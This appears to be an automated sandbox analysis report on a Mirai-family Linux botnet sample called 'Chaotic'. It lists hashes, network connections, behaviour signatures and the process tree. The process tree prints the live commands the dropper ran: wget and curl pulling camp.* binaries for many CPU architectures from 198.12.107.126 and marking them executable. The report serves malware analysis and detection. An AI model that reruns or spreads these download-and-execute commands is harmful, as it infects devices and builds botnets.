[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
Files
/tmp/busybox
| MD5 | 6ffc46165b5d9726a6607f3ea5305589 |
| SHA1 | ab127220f42e816b413dde0d17031e251a7bc98f |
| SHA256 | 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c |
| SHA512 | 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8 |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
/tmp/Chaotic
| MD5 | 62e0ec59f989335be5fbf630a49da4ea |
| SHA1 | 43bdde1afd1089008539973b08e35dd66fb7451a |
| SHA256 | c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15 |
| SHA512 | ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95 |
/tmp/Chaotic
| MD5 | 4c64afb0ad73da68d0e9dc8894d97f3a |
| SHA1 | 0d3f5938508079bf9dbbe13d75d7b91e21845312 |
| SHA256 | de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b |
| SHA512 | 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107 |
/tmp/Chaotic
| MD5 | adfc93deaed5f946d896d185a7a3672f |
| SHA1 | 30686df1ec33ec8941a6bd5471292ec4dfdc7522 |
| SHA256 | 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd |
| SHA512 | 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f |
/tmp/Chaotic
| MD5 | 69e35fed3302be73c0de271eae2690f7 |
| SHA1 | fdfb172bdcefc5f97d642c56e3771deffa0341c6 |
| SHA256 | 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981 |
| SHA512 | 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2 |
memory/842-1-0x00400000-0x0045af60-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/85/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/11/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/902/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1532/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1484/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1564/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1145/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1169/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1479/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/27/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1234/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1126/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/79/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/451/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1480/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/270/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/433/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1145/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1087/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/548/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/645/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1017/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1141/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1159/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1158/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1214/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/473/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1484/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1163/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1139/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1064/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1530/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/31/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1037/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/760/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1311/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1017/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/980/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/35/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/160/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/437/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1237/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1136/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/434/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/434/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1479/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1171/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/985/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/539/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/162/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1183/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1050/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1522/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/660/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.17:443 | tcp | |
